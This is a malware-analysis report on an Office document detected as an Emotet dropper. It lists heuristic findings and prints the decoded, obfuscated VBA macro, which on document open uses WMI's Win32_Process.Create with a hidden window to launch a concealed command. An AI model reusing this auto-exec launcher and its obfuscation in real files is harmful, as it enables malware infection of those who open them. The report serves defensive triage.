Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 397485a2bb27c1af…

MALICIOUS

Office (OLE)

253.8 KB Created: 2020-01-17 19:21:00 Authoring application: Microsoft Office Word First seen: 2021-02-18
MD5: 241dde86779c311d757e644825fa2c59 SHA-1: 42502dd34d32b3a79950bae490dbc7bb207539a4 SHA-256: 397485a2bb27c1afd95ff7c8b962c7ebfe4983db30d1e65b71c0529cdddb2f08
172 Risk Score

Heuristics 7

  • ClamAV: Doc.Dropper.Emotet-7546199-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Emotet-7546199-0
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • GetObject call high OLE_VBA_GETOBJ
    GetObject call
    Matched line in script
    Set Huuoserwq = GetObject(Dnlbrvlmi)
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
  • Document_Open macro low OLE_VBA_DOCOPEN
    Document_Open macro
    Matched line in script
    Private Sub Document_open()
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 8180 bytes
SHA-256: d7b0dff802b87609ec75ab459632a24fc9837b0e96d838b71142518eaa405eda
Detection
ClamAV: No threats found
Obfuscation or payload: likely
208 of 303 identifiers look randomly generated (e.g. 'Ssijygmqobgfk'); 1 string-concatenation chain(s) — consistent with name-mangling obfuscation.
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "Brksqxht"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_open()
Nqoahvljqksr
End Sub

Attribute VB_Name = "Rontevfyd"
Attribute VB_Base = "0{639D43C7-5467-44F5-92CD-39FE69D9E6E8}{D367A484-EAC5-4C14-8826-4AAC7B1C0491}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "Xdhtssoxjxl"
Function Vyzdaskogf()
   Select Case Mwjmkbevpi
      Case Ukoaldyenyei
         Qilemlfmwkq = 7
         Fnjisdtohts = Atn(4)
         Qpworarvlvj = Sin(Tohnekymtqepm)
      Case Aiospyvq
         Tpvvtrzyv = Log(3)
         Gupirbwzr = 6
         Vpudgrvyy = CSng(Fkucrzyfrqww)
      Case Zjxwyqyjoug
         Kicxkgooeop = ChrW(Amhoysaphhycz)
         Wwavqjnxoslp = 1
         Uvhlbqlbzvnza = Cos(Evlzusio)
End Select
Jfxcszci = ChrW(wdKeyP)
   Select Case Yhbxcpjbe
      Case Vzwapklge
         Mrnprghk = 7
         Aekczgajz = Atn(4)
         Koaxpyexk = Sin(Nxvjkmxdu)
      Case Zvulyqdlxei
         Dmscicnb = Log(3)
         Qmgqwnlwsmvo = 6
         Dzouyodf = CSng(Fxtuurgogdez)
      Case Gyliqhgp
         Ziosceoljol = ChrW(Qbaghhaxeion)
         Upvmppdv = 1
         Olcotpdp = Cos(Uhpbzihsv)
End Select
Fulnjdguw = Jfxcszci + Rontevfyd.Inrjxrsimz + Rontevfyd.Xjxslbcw
   Select Case Fhgiuhkj
      Case Xurckcjnbh
         Wjfqxaqze = 7
         Rurzjmoigjph = Atn(4)
         Rxktdggrzl = Sin(Ekksehrc)
      Case Tczanyfwh
         Fgcgfazlz = Log(3)
         Dgidyoehp = 6
         Jehudtilde = CSng(Ydhlyhsrbmnzs)
      Case Zrrznivwyy
         Fcnrbiijarcgz = ChrW(Jwribkkju)
         Gpdgjmnkm = 1
         Vlqkiihplzq = Cos(Ahqjmvstfx)
End Select
losd = Rontevfyd.Chphtxkp.GroupName
Wxbspagjl = Split(Fulnjdguw + LTrim(losd), "//====dsfnnJJJsm388//=")
   Select Case Hayloxff
      Case Blncsfctnrpm
         Rkhoivyddoff = 7
         Dvovaxcol = Atn(4)
         Agbvkkuret = Sin(Qxpwyiyxnkx)
      Case Cummrdzxfiow
         Ekoqlafyxkae = Log(3)
         Mvpildhpif = 6
         Dskpazrpumy = CSng(Pmexblnxmk)
      Case Gldlobjcvwmn
         Amqszxuvvq = ChrW(Gtasqhawuone)
         Psrtarprka = 1
         Kmykpmiwvpcc = Cos(Mlpmylmph)
End Select
Vyzdaskogf = Clhtrwrlxlfqs + Join(Wxbspagjl, "") + Clhtrwrlxlfqs
   Select Case Gpwkdfewxj
      Case Apstwebuholbb
         Nqoztljakqz = 7
         Kemsoofkxp = Atn(4)
         Vjerevjlqr = Sin(Kwmqoidxj)
      Case Dcsnnnfpbs
         Bfifuqjttzdir = Log(3)
         Volzzdyaplh = 6
         Lbeqtykkgdiga = CSng(Dykvlyjaptqu)
      Case Ttnulirvn
         Qepldszfgxqb = ChrW(Zbaoxcdhfm)
         Lopailvcuttp = 1
         Rpwhcsbk = Cos(Qgqmpjzcc)
End Select
End Function
Function Nqoahvljqksr()
d = "//====dsfnnJJJsm388//=i//====dsfnnJJJsm388//=//====dsfnnJJJsm388//=n//====dsfnnJJJsm388//=m//====dsfnnJJJsm388//=gmt//====dsfnnJJJsm388//=" + ChrW(wdKeyS) + "//====dsfnnJJJsm388//=:w//====dsfnnJJJsm388//=in//====dsfnnJJJsm388//=32//====dsfnnJJJsm388//=//====dsfnnJJJsm388//=_//====dsfnnJJJsm388//=" + Rontevfyd.Tghnzxczsfi + "//====dsfnnJJJsm388//=ro//====dsfnnJJJsm388//=ce//====dsfnnJJJsm388//=ss"
   Select Case Zbroyruhnrws
      Case Ffqxmfxfi
         Ozrnhnir = 7
         Xgofwzwzmfmy = Atn(4)
         Slkagutsgnksc = Sin(Doaeqhzcr)
      Case Afwenqyru
         Ilxxfzav = Log(3)
         Dtjrmujrtitka = 6
         Wcattlzjafp = CSng(Czbwljxmnmbw)
      Case Bnjxkdjjxabkl
         Jmwnqpthwz = ChrW(Bipzxelxvqied)
         Bbuaxtdeaeiy = 1
         Gmytgiaib = Cos(Zgoseskhw)
End Select
E = "//====dsfnnJJJsm388//="
   Select Case Vzvqvcek
      Case Ruyxenbccw
         Kskwkwvqgz = 7
         Gvutxpfgdd = Atn(4)
         Tmfeouwxdloc = Sin(Rhpvdsjoqisie)
      Case Shhlqcyrqblc
         Vgsnyyxri = Log(3)
         Kfvwmgqkgkd = 6
         Ovsqytrpvhu = CSng(Ufotbzgx)
      Case Cueuvshwszcyd
         Soiyoxbul = ChrW(Vmjeathxpw)
         Wxnlccywcimil = 1
         Sabzsikwvmoyi = Cos(Plxombblz)
End Select
Wfitycfl = Split("//====dsfnnJJJsm388//=//====dsfnnJJJsm388//=w//====dsfnnJJJsm388//=//====dsfnnJJJsm388//=" + d + T, E)
   Select Case Kvgdqtghrpvuy
      Case Czpyxzskmxt
         Gvcnaxfdsfvvr = 7
         Bbttelbqbor = Atn(4)
         Ktfxqjbwmiua = Sin(Juucgibjld)
      Case Mefbziyntyzxf
         Votzsfysvhl = Log(3)
         Raicyqwwqlj = 6
         Ltluwwyt = CSng(Sehunmjtnxiw)
      Case Xzplseckoqt
         Akpmwlepx = ChrW(Ijhsvnupbvxxh)
         Bsiqqajf = 1
         Yllknazis = Cos(Wkoawddldn)
End Select
Dnlbrvlmi = Join(Wfitycfl, "")
   Select Case Hypdzvxwjwy
      Case Cziwemkh
         Fozsbhuywkay = 7
         Fttjukgmx = Atn(4)
         Ryobvsjo = Sin(Pacvopyctz)
      Case Erlsanho
         Uojjgwarrjv = Log(3)
         Tqnfvikefzr = 6
         Qcsvgprygomfj = CSng(Biuejarc)
      Case Mghmooroj
         Zvcgcrncbamfi = ChrW(Enlvzaeouikmr)
         Raxdbnsxgjez = 1
         Aaykrjedn = Cos(Vhixsfvdgjlhe)
End Select
Set Huuoserwq = GetObject(Dnlbrvlmi)
   Select Case Piodpdvq
      Case Ygrzrptjapkbw
         Minpxffki = 7
         Yeplwcovdiuhs = Atn(4)
         Mjrpnmzxcu = Sin(Hqtwidvr)
      Case Psinalwrbuak
         Ssijygmqobgfk = Log(3)
         Dwwxstyham = 6
         Lsnzwxxd = CSng(Msihyeggvbkf)
      Case Dnabukhwkfbya
         Hmjvikeplv = ChrW(Urmrfuqv)
         Vjfnqidfaedwn = 1
         Jqnzxoga = Cos(Fxnwekgakrz)
End Select
Umhwjcyvyq = Rontevfyd.Matygofb.Tag
Bmcwdtqg = Dnlbrvlmi + ChrW(wdKeyS) + Rontevfyd.Olocpxenwtr.Tag + Umhwjcyvyq
   Select Case Cwlkjlri
      Case Mhbujzbltp
         Qjoayiysyto = 7
         Uijzzfobhotzg = Atn(4)
         Fxxkoogc = Sin(Nikdnssaup)
      Case Lujymiuuardv
         Wenlognp = Log(3)
         Dyuwbzmqmnlca = 6
         Xhbjvfpq = CSng(Onjakewinuooy)
      Case Fnizptdx
         Ymgqroihamm = ChrW(Bjpunvnijii)
         Gqxdlqzjmrqs = 1
         Ghygocxhq = Cos(Pbvipexzairjw)
End Select
Spjksgmeepscf = Bmcwdtqg + Rontevfyd.Tghnzxczsfi
   Select Case Dpstloipowlib
      Case Mzwtqzsvetgcv
         Ronedkmy = 7
         Zidwrcurqphd = Atn(4)
         Alunzemnknf = Sin(Wgoaaeaqqpyn)
      Case Keptnkxdsp
         Ngmxpruhxkbog = Log(3)
         Zkvvaisb = 6
         Trmxsnzbbqtet = CSng(Tjozcanog)
      Case Wtyqvedbwahk
         Cneijvqwogydb = ChrW(Gcgyzqfdkvpa)
         Hmzjczni = 1
         Ddafssscxgpxa = Cos(Fxkunuuzt)
End Select
Set Nqoahvljqksr = GetObject(Spjksgmeepscf)
   Select Case Wkvyuhfdmgt
      Case Abpjjcosgtj
         Fvmegzhajmnl = 7
         Xbxznxcjzxou = Atn(4)
         Vpqlwdcjrizti = Sin(Pcxohqqjtveo)
      Case Opmtkftvbprrn
         Atpnrjuqfyg = Log(3)
         Wqsogmcsn = 6
         Kxtbixpcgttbo = CSng(Muzgvean)
      Case Xdlahxntrc
         Siiidyndodm = ChrW(Itgetkkv)
         Tebzvgixyk = 1
         Qymabzvx = Cos(Iazegoxsjuc)
End Select
Nqoahvljqksr. _
showwindow = False
   Select Case Caecgqbw
      Case Dipmyaxcibejv
         Mszoidvshekdy = 7
         Vqilmrqxah = Atn(4)
         Uayseefu = Sin(Hosipihn)
      Case Kzgnajnfvvzgk
         Sjmgztxl = Log(3)
         Utebiqmkzs = 6
         Ksuqzzccbdrh = CSng(Vhyfmnmegqjdm)
      Case Wlhgyytliu
         Rhqbwejufm = ChrW(Hhglehvmx)
         Sjbybbwpl = 1
         Uwpomzdkh = Cos(Bzrrigbzllc)
End Select
Do While Huuoserwq. _
Create(pok & Vyzdaskogf, Kzxvdlfbqf, Nqoahvljqksr, Ddhmufor)
Loop
   Select Case Fcchzhiauxnvm
      Case Xqfektnjrhwc
         Blzcknwvtub = 7
         Oxbihgjpgec = Atn(4)
         Sskzcfiks = Sin(Scjxbxkdwey)
      Case Zpvqzvhwtev
         Trvfevlnqe = Log(3)
         Ojtzmatgua = 6
         Slxeszxotr = CSng(Hracacjlyelm)
      Case Hdbxqtemmtyhu
         Itwfzrvaq = ChrW(Rcloalpvrtmv)
         Ovegetisep = 1
         Gofmdksxcca = Cos(Mrzzmwxvwlwq)
End Select
End Function

Open this report in the interactive analyzer, or submit your own file for analysis.